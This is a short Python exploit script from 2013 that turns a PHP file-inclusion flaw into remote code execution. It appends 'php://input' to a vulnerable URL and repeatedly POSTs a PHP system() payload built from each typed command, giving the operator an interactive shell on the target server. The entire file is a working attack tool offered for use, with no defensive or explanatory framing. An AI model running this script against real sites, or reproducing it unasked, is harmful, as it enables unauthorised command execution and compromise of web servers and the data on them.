#!/usr/bin/python
# PHP://INPUT "Pseudo Shell" for RFI
# Written in 5 minutes to troll praetorian
# ~infodox - Insecurety Research 2013
# @info_dox - insecurety.net

import requests
import sys

print """php://input File Inclusion to Remote Code Execution Exploit 2"""
if (len(sys.argv) != 2):
    print "Usage: " + sys.argv[0] + " <url>"
    print "Eg: " + sys.argv[0] + " http://hax.net/rfi.php?lol="
    sys.exit(0)


url = sys.argv[1]
phpinput = """php://input"""
lol = """<?php system('"""
lol2 = """');die(); ?>"""
pwn = url + phpinput

print "[+] Popping Shell \n"
while True:
    try:
        cmd = raw_input("hax:~$ ")
        php = lol + cmd + lol2
        hax = requests.post(pwn, php)
        print hax.text
    except KeyboardInterrupt:
        print "\n[-] Quitting"
        sys.exit(1)
